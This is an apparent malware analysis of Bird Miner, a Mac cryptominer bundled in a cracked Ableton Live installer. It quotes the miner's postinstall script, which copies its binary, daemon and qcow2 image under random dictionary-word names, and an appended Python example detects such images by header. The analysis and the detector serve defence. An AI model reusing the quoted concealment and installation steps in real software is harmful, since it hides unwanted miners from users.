New Mac cryptominer Malwarebytes detects as Bird Miner runs by emulating Linux

A new Mac cryptocurrency miner Malwarebytes detects as Bird Miner has been found in a cracked installer for the high-end music production software Ableton Live. The software is used as an instrument for live performances by DJs, as well as a tool for composing, recording, mixing, and mastering. And while cryptomining is not new on Mac, this one has a unique twist: It runs via Linux emulation.


Miner behavior


The Ableton Live 10 cracked installer can be downloaded from a piracy website called VST Crack, and it’s more than 2.6 GB; a size that would be cause for alarm for most programs, but reasonable for an app of this kind. On closer inspection, however, it’s clear this installer is doing some strange things. For example, Bird Miner’s postinstall script will, among other things, copy some of the installed files to new locations under randomized names:


#RANDOM
z1="$( /Users/Shared/randwd Software )"
z11="$( /Users/Shared/randwd )"
z111="$( /Users/Shared/randwd )"
z1111="$( /Users/Shared/randwd )"
z2="$( /Users/Shared/randwd Software )"
z22="$( /Users/Shared/randwd )"
z222="$( /Users/Shared/randwd )"
z2222="$( /Users/Shared/randwd )"
z3="$( /Users/Shared/randwd )"
z33="$( /Users/Shared/randwd )"
z3333="$( /Users/Shared/randwd )"

#CREATE DIRECTORIES
mkdir "/Library/Application Support/$z1"
mkdir "/Library/Application Support/$z2"

#Move Programs
cp /Users/Shared/z1 /usr/local/bin/$z1
cp /Users/Shared/z1.daemon "/Library/Application Support/$z1/$z11"
cp /Users/Shared/z1.qcow2 "/Library/Application Support/$z1/$z111"
cp /Users/Shared/z1 /usr/local/bin/$z2
cp /Users/Shared/z1.daemon "/Library/Application Support/$z2/$z22"
cp /Users/Shared/z1.qcow2 "/Library/Application Support/$z2/$z222"

This code uses a randwd script, dropped during the install process, to generate random names from the system dictionary wordlist, so the copied binary, daemon script, and qcow2 disk image end up under names that differ from one infected machine to the next:


WORDLIST='/usr/share/dict/web2'
TMP_FILE=$(mktemp -t wordlist)
[...]
# Allows user to pass i ..
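Because every name on disk is drawn at random from a dictionary, hunting for this infection by file name is a losing game. What the malware cannot randomize is the content of the files it copies: the qcow2 disk image has to keep its header or the emulator cannot boot it. The following is an added example, not code from the Malwarebytes write-up or from the malware itself. It rebuilds the install layout from the postinstall script under a throwaway directory (using a small constructed wordlist in place of /usr/share/dict/web2, and placeholder bytes in place of the real binaries), then finds the planted images by their qcow2 magic and version fields rather than by name. The qcow2 header layout (magic "QFI\xfb" followed by a big-endian version of 2 or 3) is the real format; the wordlist, seed, directory root, and helper names are assumptions made for the demo.

```python
"""Hunt for randomly named qcow2 images by content, not by file name.
Added example; not from the Malwarebytes post or the Bird Miner installer."""
import os
import random
import struct
import tempfile
from pathlib import Path

QCOW2_MAGIC = b"QFI\xfb"      # first four bytes of every qcow2 image
QCOW2_VERSIONS = (2, 3)       # header version field, big-endian uint32

# Constructed stand-in for /usr/share/dict/web2, which randwd draws from.
WORDLIST = ["acorn", "bramble", "cinder", "dapple", "ember", "fennel",
            "gravel", "hollow", "inkwell", "juniper"]


def random_names(rng, count, suffix=""):
    """Mimic randwd: draw distinct dictionary words, optionally with a suffix
    (the script calls `randwd Software` when naming the directories)."""
    return [word + suffix for word in rng.sample(WORDLIST, count)]


def fake_qcow2_image(version=3, payload_len=512):
    """Minimal bytes that carry a valid qcow2 header: magic + version + padding."""
    return QCOW2_MAGIC + struct.pack(">I", version) + b"\x00" * payload_len


def build_fake_install(root, rng):
    """Lay out what the postinstall script creates, rooted at `root` instead of `/`:
    two randomly named Application Support dirs, each with a randomly named daemon
    script and qcow2 image, plus a same-named binary in usr/local/bin.
    Returns the relative paths of the planted images so a caller can check detection."""
    app_support = root / "Library" / "Application Support"
    bin_dir = root / "usr" / "local" / "bin"
    bin_dir.mkdir(parents=True)
    planted = []
    for dir_name in random_names(rng, 2, "Software"):
        daemon_name, image_name = random_names(rng, 2)
        target = app_support / dir_name
        target.mkdir(parents=True)
        (bin_dir / dir_name).write_bytes(b"#!/bin/sh\n# placeholder for the copied z1 binary\n")
        (target / daemon_name).write_bytes(b"#!/bin/sh\n# placeholder for z1.daemon\n")
        (target / image_name).write_bytes(fake_qcow2_image())
        planted.append(str((target / image_name).relative_to(root)))
    return sorted(planted)


def find_qcow2_images(root):
    """Walk `root` and return relative paths of files whose first 8 bytes form a
    qcow2 header. Names are deliberately ignored: randwd defeats name-based
    indicators, but the image must keep its magic for the emulator to boot it."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            try:
                with open(path, "rb") as fh:
                    header = fh.read(8)
            except OSError:
                continue   # unreadable file; skip rather than abort the sweep
            if len(header) < 8 or header[:4] != QCOW2_MAGIC:
                continue
            (version,) = struct.unpack(">I", header[4:8])
            if version in QCOW2_VERSIONS:
                hits.append(str(path.relative_to(root)))
    return sorted(hits)


def run_demo(seed=7):
    """Build the fake tree in a temp dir, sweep it, and return planted vs. found."""
    rng = random.Random(seed)
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        planted = build_fake_install(root, rng)
        found = find_qcow2_images(root)
    return {"planted": planted, "found": found}


if __name__ == "__main__":
    for hit in run_demo()["found"]:
        print("qcow2 image:", hit)
```

On a real system you would point find_qcow2_images at /Library/Application Support and /Users/Shared (and, since the page notes a copy is placed in /usr/local/bin, check that directory for recently added dictionary-word binaries as well). A qcow2 image sitting under Application Support with a plain English word for a name is unusual enough to be worth a look on its own; pairing it with a daemon script in the same directory, as the postinstall script lays out, is the pattern to alert on.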
